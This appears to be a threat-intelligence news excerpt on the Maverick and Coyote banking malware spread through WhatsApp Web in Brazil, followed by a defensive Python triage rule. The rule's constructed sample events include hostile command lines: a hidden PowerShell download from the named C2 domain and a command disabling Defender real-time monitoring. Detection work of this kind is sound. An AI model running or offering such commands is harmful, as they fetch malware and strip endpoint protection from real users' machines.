
"The campaign involves two components: A self-propagating malware referred to as SORVEPOTEL that's spread via the desktop web version of WhatsApp and is used to deliver a ZIP archive containing the Maverick payload. The malware is designed to monitor active browser window tabs for URLs that match a hard-coded list of financial institutions in Latin America. Should the URLs match, it establishes contact with a remote server to fetch follow-on commands to gather system information and serve phishing pages to steal credentials."
"The latest findings from CyberProof show that the ZIP file contains a Windows shortcut (LNK) that, when launched by the user, runs cmd.exe or PowerShell to connect to an external server ("zapgrande[.]com") to download the first-stage payload. The PowerShell script is capable of launching intermediate tools designed to disable Microsoft Defender Antivirus and UAC, as well as retrieve a .NET loader."
Both Coyote and Maverick are .NET banking malware families targeting Brazilian users and banks; both carry decryption routines, match against lists of banking URLs, and monitor banking applications. Both strains can spread via WhatsApp Web, using socially engineered ZIP archives delivered through the desktop WhatsApp client. Maverick's campaign includes a self-propagating component called SORVEPOTEL that delivers a ZIP containing the Maverick payload. The malware monitors active browser tabs for hard-coded Latin American financial URLs, then contacts a remote server to receive commands to gather system information and serve phishing pages that harvest credentials. A ZIP containing an LNK can launch cmd.exe or PowerShell to retrieve a first-stage payload from zapgrande[.]com; the PowerShell script can disable Microsoft Defender Antivirus and UAC and retrieve a .NET loader. Sophos noted possible links to prior Coyote campaigns, and Kaspersky found code overlaps while treating Maverick as a distinct, widespread Brazilian threat.
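The delivery chain described above (LNK from a WhatsApp-delivered ZIP spawning cmd.exe or PowerShell, which reaches out to zapgrande[.]com and tampers with Defender and UAC) lends itself to a simple process-creation triage rule. The following is an added example, not code from the reporting or from either vendor; the process names, the Defender/UAC tamper tokens, the scoring weights and the sample events are all assumptions or constructed data.

```python
from dataclasses import dataclass

# Indicator from the reporting above; the page defangs it as "zapgrande[.]com".
C2_DOMAINS = {"zapgrande.com"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Assumption: a double-clicked LNK is launched via explorer.exe, and the desktop
# WhatsApp client runs as whatsapp.exe.
LNK_LAUNCHERS = {"explorer.exe", "whatsapp.exe"}
# Assumption: common Defender/UAC tamper tokens; the page only says the script
# disables both, not how.
TAMPER_TOKENS = ("set-mppreference", "disablerealtimemonitoring", "enablelua")
DOWNLOAD_TOKENS = ("downloadstring", "downloadfile", "invoke-webrequest",
                   "iwr ", "curl ", "certutil")

@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str

def refang(s: str) -> str:
    """Normalise defanged indicators so both forms match."""
    return s.replace("[.]", ".").replace("hxxp", "http")

def score_event(ev: ProcEvent):
    """Return (score, reasons) for one process-creation event."""
    image = ev.image.rsplit("\\", 1)[-1].lower()
    parent = ev.parent_image.rsplit("\\", 1)[-1].lower()
    cmd = refang(ev.command_line.lower())
    score, reasons = 0, []
    if image not in SCRIPT_HOSTS:
        return score, reasons            # only script hosts are of interest here
    if parent in LNK_LAUNCHERS:
        score += 1; reasons.append(f"{image} spawned by {parent} (LNK-style launch)")
    if any(d in cmd for d in C2_DOMAINS):
        score += 3; reasons.append("known first-stage domain in command line")
    if any(t in cmd for t in DOWNLOAD_TOKENS):
        score += 1; reasons.append("download primitive in command line")
    if any(t in cmd for t in TAMPER_TOKENS):
        score += 2; reasons.append("Defender/UAC tamper token in command line")
    return score, reasons

def triage(events, threshold=3):
    """Return [(event, score, reasons)] for events at or above the threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev, score, reasons))
    return hits

SAMPLE_EVENTS = [  # constructed sample telemetry, not real captures
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              'cmd.exe /c powershell -w hidden -c "iwr hxxp://zapgrande[.]com/a -OutFile $env:TEMP\\a.ps1"'),
    ProcEvent(r"C:\Users\u\AppData\Local\WhatsApp\WhatsApp.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -nop -w hidden -c Set-MpPreference -DisableRealtimeMonitoring $true"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Program Files\Notepad++\notepad++.exe", "notepad++.exe notes.txt"),
]
```

Running `triage(SAMPLE_EVENTS)` flags the first two constructed events (scores 5 and 3) and leaves the benign cmd.exe and notepad++ events below the threshold.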
Read at The Hacker News